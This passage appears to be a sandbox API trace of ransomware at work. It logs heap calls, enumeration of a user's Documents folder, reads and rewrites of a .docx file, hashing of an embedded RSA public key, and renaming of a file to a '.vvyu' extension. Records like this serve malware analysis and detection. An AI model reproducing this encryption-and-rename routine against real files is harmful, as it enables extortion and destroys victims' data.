dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0184.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0184.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0184.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea68 [0184.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0184.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0184.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0184.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea08 [0184.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0184.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0184.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0184.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0184.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea20 [0184.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0184.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0184.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0184.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9f0 [0184.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0184.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea80 [0184.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0184.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea50 [0184.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea38 [0184.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea98 [0184.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea38 | out: hHeap=0x6a0000) returned 1 [0184.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea38 [0184.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea50 | out: hHeap=0x6a0000) returned 1 [0184.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0184.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0184.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0184.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea08 | out: hHeap=0x6a0000) returned 1 [0184.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea08 [0184.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0184.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea68 | out: hHeap=0x6a0000) returned 1 [0184.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0184.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea98 | out: hHeap=0x6a0000) returned 1 [0184.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0184.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0184.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0184.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea08 | out: hHeap=0x6a0000) returned 1 [0184.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0184.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0184.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0184.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0184.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0184.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0184.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0184.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea38 | out: hHeap=0x6a0000) returned 1 [0184.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea80 | out: hHeap=0x6a0000) returned 1 [0184.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea20 | out: hHeap=0x6a0000) returned 1 [0184.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9f0 | out: hHeap=0x6a0000) returned 1 [0184.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9d8 | out: hHeap=0x6a0000) returned 1 [0184.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dd8c0 | out: hHeap=0x6a0000) returned 1 [0184.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0184.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0184.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.809] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x159af, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x159af, lpOverlapped=0x0) returned 1 [0184.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0184.810] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x159b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.810] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0184.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0184.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0184.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0184.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0184.811] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0184.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0184.812] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0184.812] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0184.812] CloseHandle (hObject=0x584) returned 1 [0184.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0184.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d41908 [0184.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0184.815] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\nTkcVHLlB.pps" (normalized: "c:\\users\\keecfmwgj\\documents\\ntkcvhllb.pps"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\nTkcVHLlB.pps.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\ntkcvhllb.pps.vvyu")) returned 1 [0184.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.817] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0184.820] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43223d0, ftCreationTime.dwHighDateTime=0x1d820f9, ftLastAccessTime.dwLowDateTime=0xf4a966e0, ftLastAccessTime.dwHighDateTime=0x1d86602, ftLastWriteTime.dwLowDateTime=0xf4a966e0, ftLastWriteTime.dwHighDateTime=0x1d86602, nFileSizeHigh=0x0, nFileSizeLow=0x5a9e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OkF0P0lVbo seJvjybv_.docx", cAlternateFileName="OKF0P0~1.DOC")) returned 1 [0184.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6dd8c0 [0184.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0184.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dd8c0 | out: hHeap=0x6a0000) returned 1 [0184.821] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\OkF0P0lVbo seJvjybv_.docx") returned=".docx" [0184.821] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\OkF0P0lVbo seJvjybv_.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\okf0p0lvbo sejvjybv_.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.821] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=23198) returned 1 [0184.821] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0184.824] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5a78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.824] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0184.826] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.826] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x5a9e, lpOverlapped=0x0) returned 1 [0184.827] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0184.827] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.827] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.827] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0184.828] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0184.828] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.828] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0184.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0184.828] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0184.828] GetLastError () returned 0x0 [0184.828] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0184.828] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0184.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0184.829] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0184.829] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0184.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.829] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0184.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5aa0) returned 0x2d43778 [0184.829] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0184.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0184.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0184.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6dd8c0 [0184.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9d8 [0184.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6dd950 [0184.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9f0 [0184.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea20 [0184.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea80 [0184.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea38 [0184.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0184.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0184.830] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0184.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0184.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea20 | out: hHeap=0x6a0000) returned 1 [0184.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea38 | out: hHeap=0x6a0000) returned 1 [0184.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea80 | out: hHeap=0x6a0000) returned 1 [0184.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0184.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea80 [0184.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0184.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea38 [0184.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4ea20 [0184.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0184.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0184.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0184.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0184.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0184.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0184.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea38 | out: hHeap=0x6a0000) returned 1 [0184.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea20 | out: hHeap=0x6a0000) returned 1 [0184.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea80 | out: hHeap=0x6a0000) returned 1 [0184.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.833] 